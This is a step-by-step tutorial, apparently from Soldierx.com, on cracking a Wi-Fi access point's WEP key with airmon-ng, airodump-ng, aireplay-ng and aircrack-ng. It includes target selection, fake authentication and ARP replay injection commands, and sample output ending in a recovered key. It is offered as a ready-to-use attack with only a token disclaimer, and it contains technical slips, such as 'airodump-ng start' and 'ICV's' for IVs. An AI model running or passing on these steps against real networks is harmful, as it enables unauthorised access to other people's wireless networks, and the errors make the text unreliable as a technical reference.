Cracking WEP with the aircrack-ng suite(hacking wi-fi hotspot)

Prerequisites:
Linux CMD experience
Backtrack 4 R2 or Ubuntu 7.10 + patched
WiFi Drivers + Aircrack-ng suite
common sense
The information in this tutorial is for
educational and informational purposes
only, use it at your own risk.
Soldierx.com, it's members, crew, and
affiliates cannot be held responsible for
the misuse of this information.
WEP encryption has been hailed as one of
the least secure methods of securing a
wireless access point in the history of
WiFi since wireless encryption standards
began being developed. The main reason
for this is that fragments of the key are
sent between a client computer and the
access point in 32bit initialization vectors
commonly referred to as ICV's.
Statistically it has been shown that a
certain volume of these have weak
encryption and are vulnerable to packet
analysis. The number of packets required
to crack an access point's key can vary
from 200 to 500 thousand for 64 and 128
bit encryption respectively.
***NOTE***
**This Tutorial will cover a basic WEP
crack
**It is by no means exhaustive and is
meant for
**A jumping off point, from here I send
you to Google
**The place where I first got my
information.
**********
***ALL COMMANDS LISTED IN THIS
TUTORIAL ARE BEING RUN FROM THE root
ACCOUNT ON THE MACHINE, IF YOU ARE
NOT RUNNING BACKTRACK OR YOU
BUILT YOUR OWN SYSTEM YOU NEED TO
LOG IN AS ROOT OR sudo EACH
COMMAND***
The first step in any cracker's attempt at a
WiFi access point is to pick a target. This
can be achieved by running airmon-ng
to list any and all available network
adapters.
Interface Chipset
Driver
wifi0 Atheros
madwifi-ng
ath0 Atheros
madwifi-ng VAP (parent:
wifi0) (VAP destroyed)
Then you want to type airodump-ng
start (adapter name: ath0, wlan0,
wlan1, etc) What this does is put you
wireless adapter into promiscuous or
monitor mode which allows it to accept
all traffic and basically grab ARP packets
and such from out of the air, it also allows
tha adapter to do what is called packet
injection, basically shooting packets into
the network to get a response from the
Access point. The next command to run is
airodump-ng (adapter name: mon0,
mon1, eth0, etc.) this will list all available
access points and let you choose one. you
will want to pick one with the best signal.
The way to check what the best signal is is
to look at the pwr column while the
program is running. a strong signal will be
a low number preceded by a dash (-) such
as -56 or -86 . The First example would be
the stronger one as I believe the strength
is measured in -dBm or the power ratio in
decibels (dB) of the measured power
referenced to one milliwatt. the lower
number being stronger as you get more
towards a positive output of power.
CH 9 ][ Elapsed: 8 mins ]
[ 2007-03-21 19:25
BSSID PWR RXQ
Beacons #Data, #/s CH
MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 42 100
5240 178307 338 9
54 WEP WEP teddy
BSSID STATION
PWR Lost
Packets Probes
00:14:6C:7E:40:80
00:0F:B5:88:AC:82 42
0 183782
Once you have selected your target, make
note of the BSSID, Channel, and the
amount of data it recieves. Another good
indicator of a good accesspoint to crack
would be a reasonable amount of data
recieved (80-120 without injection, can
be more). You would then run the
command airodump-ng -w
filename --channel (channel
of target) --bssid (bssid or
MAC address of target)
(interface to capture on,
mon0, eth0, whatever airmon
gives you as the monitor mode
interface typically mon0)
Example:
airodump-ng -w output --
channel 9 --bssid
00:14:6C:7E:40:80 ath0
At this stage you would then open a tab
in your console window for a separate
session and run aireplay-ng -1 0
-a (bssid of target)
(interface) this is a fake
authentication attack and will give you
something like this:
18:18:20 Sending
Authentication Request
18:18:20 Authentication
successful
18:18:20 Sending Association
Request
18:18:20 Association
successful
if you are successful. once you have
achieved a successful association then you
run the injection to gather data. (you
want to run this alongside airodump-ng
because airodump captures and dumps
packets to a .cap file that you will be
running through aircrack-ng). To set the
attack we will be running this command
aireplay-ng -3 -b (bssid of
target) (interface) . This
command starts an ARP request replay
attack which will stimulate the gathering
of data that you need to crack the access
point with.
Example:
aireplay-ng -3 -b
00:14:6C:7E:40:80 ath0
You Should see this:
Saving ARP requests in
replay_arp-0321-191525.cap
You should also start
airodump-ng to capture
replies.
Read 629399 packets (got
316283 ARP requests), sent
210955 packets...
open another console window, a third
one, and enter aircrack-ng
filename.cap and aricrack will
attempt a crack with what you have
captured, and if it does not succeed it will
monitor the amount of data you have
recieved and continue trying to crack the
key at regular intervals. once the crack
has succeeded you will know it by a
screen that has this:
Aircrack-
ng 0.9
[00:03:06] Tested 674449
keys (got 96610 IVs)
KB depth byte(vote)
0 0/ 9 12( 15)
F9( 15) 47( 12) F7( 12)
FE( 12) 1B( 5) 77( 5)
A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61)
E8( 27) E0( 24) 06( 18)
3B( 16) 4E( 15) E1( 15)
2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87)
A6( 63) 15( 17) 02( 15)
6B( 15) E0( 15) AB( 13)
0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A
( 20) 9B( 20) 4B( 17) 4A
( 16) 2B( 15) 4D( 15)
58( 15) 6A( 15) 7C( 15)
KEY
FOUND! [ 12:34:56:78:90 ]
Probability: 100%
this screen will let you know that you
have successfully cracked the key and you
can copy it down to use or test. you cn
backup the .cap files to a flash drive and
crack at a later date if you lose the key.
though if the access point's key changes
you may have to crack it again.
This is all that is really needed to know to
crack a WEP encrypted access point.